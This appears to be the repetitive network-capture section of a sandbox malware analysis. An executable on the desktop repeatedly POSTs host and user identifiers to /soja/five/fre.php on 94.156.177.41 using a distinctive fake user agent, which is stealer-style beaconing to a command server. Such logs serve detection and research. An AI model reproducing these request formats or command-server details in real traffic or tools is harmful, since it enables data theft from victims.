                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:17.219155073 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:18.734575987 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:18 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.54972194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:18.992889881 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:19.113785028 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:20.432812929 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:20 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.54972494.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:20.693635941 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:20.813749075 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:22.279855967 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:22 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.54972694.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:22.539007902 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:22.659041882 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:24.172015905 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:23 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.54972794.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:24.429666042 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:24.549788952 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:25.971957922 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:25 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.54973394.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:26.244560003 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:26.365633011 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:27.874193907 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:27 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.54973994.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:28.145422935 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:28.268944025 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:29.593564987 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:29 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.54974594.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:29.872065067 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:29.992183924 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:31.306025028 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:31 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.54975094.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:31.570786953 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:31.691657066 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:33.012461901 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:32 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.54975194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:33.444705009 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:33.568486929 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:35.031781912 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:34 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.54975794.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:35.301023006 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:35.425400972 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:36.795099020 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:36 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.54976294.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:37.057039022 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:37.177766085 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:38.452260017 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:38 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.54976894.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:38.711698055 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:38.836045027 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:40.153877020 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:39 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    20192.168.2.54977194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:40.412333965 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:40.534388065 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:41.957781076 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:41 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    21192.168.2.54977594.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:42.228101015 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:42.351772070 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:43.776398897 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:43 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.54978194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:44.048556089 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:44.168555021 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:45.678314924 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:45 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    23192.168.2.54978594.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:45.947307110 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:46.067495108 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:47.491398096 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:47 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    24192.168.2.54979194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:47.887581110 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:48.007586002 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:49.519181013 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:49 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    25192.168.2.54979794.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:49.794187069 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:49.915880919 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:51.273123980 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:51 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    26192.168.2.54980194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:51.543040037 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:52:51.665644884 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:52:53.173119068 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:52:52 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    27192.168.2.54980694.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:52:53.608174086 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
